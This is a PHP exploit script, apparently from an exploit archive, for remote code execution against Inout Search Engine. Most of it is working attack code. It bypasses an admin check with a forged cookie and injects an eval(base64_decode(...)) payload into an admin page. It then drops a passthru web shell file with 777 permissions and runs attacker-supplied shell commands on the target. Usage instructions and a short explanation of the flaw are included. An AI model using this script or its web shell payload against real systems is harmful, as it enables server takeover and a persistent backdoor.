inoutse-exec.txt

`#!/usr/bin/php -q -d short_open_tag=on  
<?  
echo "  
Inout Search Engine (all version) Remote Code Execution Exploit  
by BlackHawk <[email protected]> <http://itablackhawk.altervista.org>  
Thanks to rgod for the php code and Marty for the Love  
  
";  
if ($argc<3) {  
echo "Usage: php ".$argv[0]." Host Path cmd  
Host: target server (ip/hostname)  
Path: path of inoutsearchengine  
cmd: a Shell command  
  
Example:  
php ".$argv[0]." localhost /inoutsearchengine/ dir";  
  
die;  
}  
/*  
Vuln Explanation:  
  
Take a look on one of the admin files, the begin should be something like this:  
  
<?php  
include("config.inc.php");  
if(!isset($_COOKIE['admin']))  
{  
header("Location:index.php");  
}  
?>  
  
this is not a protection for two reasons:  
  
i) everyone can make a cookie with false credentials  
ii) there isn't any exit or die function after header('Location: index.php')  
  
Now look at create engine.php, and you find that there isn't any parse of the  
text you send as the engine name..  
  
Besides that the names of the tabs are written into a PHP files to make faster  
the loading process.. the only limit we have while we inject the code is taht we  
can't put spaces in the code, otherwise php will end with an error..  
  
*/  
  
error_reporting(0);  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout",5);  
  
function quick_dump($string)  
{  
$result='';$exa='';$cont=0;  
for ($i=0; $i<=strlen($string)-1; $i++)  
{  
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))  
{$result.=" .";}  
else  
{$result.=" ".$string[$i];}  
if (strlen(dechex(ord($string[$i])))==2)  
{$exa.=" ".dechex(ord($string[$i]));}  
else  
{$exa.=" 0".dechex(ord($string[$i]));}  
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}  
}  
return $exa."\r\n".$result;  
}  
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';  
function sendpacketii($packet)  
{  
global $proxy, $host, $port, $html, $proxy_regex;  
if ($proxy=='') {  
$ock=fsockopen(gethostbyname($host),$port);  
if (!$ock) {  
echo 'No response from '.$host.':'.$port; die;  
}  
}  
else {  
$c = preg_match($proxy_regex,$proxy);  
if (!$c) {  
echo 'Not a valid proxy...';die;  
}  
$parts=explode(':',$proxy);  
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";  
$ock=fsockopen($parts[0],$parts[1]);  
if (!$ock) {  
echo 'No response from proxy...';die;  
}  
}  
fputs($ock,$packet);  
if ($proxy=='') {  
$html='';  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
}  
else {  
$html='';  
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {  
$html.=fread($ock,1);  
}  
}  
fclose($ock);  
}  
  
$host=$argv[1];  
$path=$argv[2];  
$cmd="";  
for ($i=3; $i<=$argc-1; $i++){  
$cmd.=" ".$argv[$i];  
}  
$cmd=urlencode($cmd);  
  
  
$port=80;  
$proxy="";  
  
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}  
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}  
  
  
echo "- Injecting Shell Creator..\r\n";  
/*  
It was too simple to inject directly the shell into the file..  
Let's make the process longer :P  
  
*/  
$data="term=<?eval(base64_decode(\$_POST[shell]));?>&Submit=Create+New+Engine+%21+&spl=term";  
$packet="POST ".$p."admin/create_engine.php HTTP/1.0\r\n";  
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";  
$packet.="Referer: http://".$host.$path."admin/create_engine.php\r\n";  
$packet.="Accept-Language: it\r\n";  
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";  
$packet.="Accept-Encoding: gzip, deflate\r\n";  
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Content-Length: ".strlen($data)."\r\n";  
$packet.="Connection: Close\r\n";  
$packet.="Cache-Control: no-cache\r\n\r\n";  
$packet.=$data;  
sendpacketii($packet);  
  
echo "- refreshing data file..\r\n";  
$packet="GET ".$p."admin/generate_tabs.php HTTP/1.0\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
echo "- Creating the real Shell..\r\n";  
/*  
Costumize it as you want..  
*/  
$my_shell = base64_encode('$fp=fopen(\'piggy_marty.php\',\'w\');  
fputs($fp,\'<?php error_reporting(0);  
set_time_limit(0);  
if (get_magic_quotes_gpc()) {  
$_GET[cmd]=stripslashes($_GET[cmd]);  
}  
echo 666999;  
passthru($_GET[cmd]);  
echo 666999;  
?>\');  
fclose($fp);  
chmod(\'piggy_marty.php\',777);');  
$data="shell=$my_shell";  
$packet="POST ".$p."index.php HTTP/1.0\r\n";  
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";  
$packet.="Referer: http://".$host.$path."index.php\r\n";  
$packet.="Accept-Language: it\r\n";  
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";  
$packet.="Accept-Encoding: gzip, deflate\r\n";  
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Content-Length: ".strlen($data)."\r\n";  
$packet.="Connection: Close\r\n";  
$packet.="Cache-Control: no-cache\r\n\r\n";  
$packet.=$data;  
sendpacketii($packet);  
  
echo "StepX - Executing Shell..\r\n";  
$packet="GET ".$p."piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Cookie: cmd=$cmd\r\n";  
$packet.="Connection: Close\r\n\r\n";  
sendpacketii($packet);  
if (strstr($html,"666999"))  
{  
echo "Exploit succeeded...\r\n";  
$temp=explode("666999",$html);  
die("\r\n".$temp[1]."\r\n");  
}  
  
# Coded With BH Fast Generator v0.1  
?>  
`